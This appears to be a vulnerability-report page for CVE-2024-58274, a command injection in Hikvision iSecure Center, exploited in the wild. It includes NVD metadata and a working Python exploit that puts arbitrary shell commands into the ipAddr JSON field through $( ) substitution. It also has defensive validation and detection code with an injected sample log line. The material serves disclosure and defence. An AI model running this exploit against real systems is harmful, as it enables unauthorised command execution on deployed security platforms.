Security Vulnerability Report
CVE-2024-58274 CVSS 8.3 HIGH

CVE-2024-58274

Published: 2025-10-22 04:15:56
Last Modified: 2026-04-15 00:35:42

Description

Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2024-08-01 allows execution of a command within $( ) in /center/api/installation/detection JSON data, as exploited in the wild in 2024 and 2025.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hikvision iSecure Center <= 2024-08-01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-58274 - Hikvision iSecure Center Command Injection PoC
# Vulnerability: Command Injection via /center/api/installation/detection endpoint
# Payload injection through $( ) command substitution syntax in JSON data
import requests
import json

TARGET_URL = "https://target-host"
VULNERABLE_ENDPOINT = "/center/api/installation/detection"


def exploit(target_url, command):
    """
    Exploit CVE-2024-58274 by injecting OS commands via $( ) syntax
    in the JSON payload sent to the installation detection endpoint.
    """
    url = f"{target_url}{VULNERABLE_ENDPOINT}"

    # Construct malicious JSON payload with command substitution
    payload = {
        "ipAddr": f"$( {command} )",
        "port": "80"
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        response = requests.post(
            url,
            data=json.dumps(payload),
            headers=headers,
            verify=False,
            timeout=10
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


# Example usage - execute arbitrary command
if __name__ == "__main__":
    # Command to execute on the target server
    cmd = "id"  # Change to any desired command
    exploit(TARGET_URL, cmd)

# Nuclei template reference:
# https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/hikvision/hikvision-csmp-installation-rce.yaml
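The root cause is that a JSON field reaches a shell unchecked, so the fix is an allow-list on the field and a detection rule on the request log. The following is an added example (not Hikvision's code and not from the PoC author); the field names ipAddr and port are taken from the PoC above, and the access-log line format is a constructed assumption.

```python
import ipaddress
import json
import re

DETECTION_PATH = "/center/api/installation/detection"
# Shell metacharacters that a host address field never legitimately contains.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;&|<>\n]")


def is_ip_address(value) -> bool:
    """Strict allow-list: accept only a string that parses as an IPv4/IPv6 address."""
    if not isinstance(value, str):
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def validate_detection_body(body: str) -> tuple:
    """Server-side validation of the JSON body before any field could reach a shell.
    Returns (accepted, reason); a rejected body must never be interpolated into a command."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return False, "malformed JSON"
    if not isinstance(data, dict):
        return False, "body must be a JSON object"
    if not is_ip_address(data.get("ipAddr")):
        return False, "ipAddr is not a valid IP address"
    port = str(data.get("port", ""))
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        return False, "port is not a valid TCP port"
    return True, "ok"


def flag_injection_attempts(log_lines):
    """Detection over constructed access-log lines '<ts> <method> <path> <json body>':
    return each request to the detection endpoint whose body carries shell metacharacters."""
    hits = []
    for line in log_lines:
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[2] != DETECTION_PATH:
            continue
        if SHELL_META.search(parts[3]):
            hits.append(line)
    return hits


# Constructed sample log lines (not real traffic): one benign request, one injection attempt.
SAMPLE_LOGS = [
    '2025-10-22T04:15:56Z POST /center/api/installation/detection {"ipAddr":"10.0.0.5","port":"80"}',
    '2025-10-22T04:16:02Z POST /center/api/installation/detection {"ipAddr":"$( id )","port":"80"}',
    '2025-10-22T04:16:09Z GET /center/api/status {}',
]
```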

References

https://forum.butian.net/article/498
https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/hikvision/hikvision-csmp-installation-rce.yaml
https://xz.aliyun.com/news/14639

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2024-58274",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-22T04:15:55.680",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2024-08-01 allows execution of a command within $( ) in /center/api/installation/detection JSON data, as exploited in the wild in 2024 and 2025."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://forum.butian.net/article/498",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/hikvision/hikvision-csmp-installation-rce.yaml",
        "source": "[email protected]"
      },
      {
        "url": "https://xz.aliyun.com/news/14639",
        "source": "[email protected]"
      },
      {
        "url": "https://xz.aliyun.com/news/14639",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}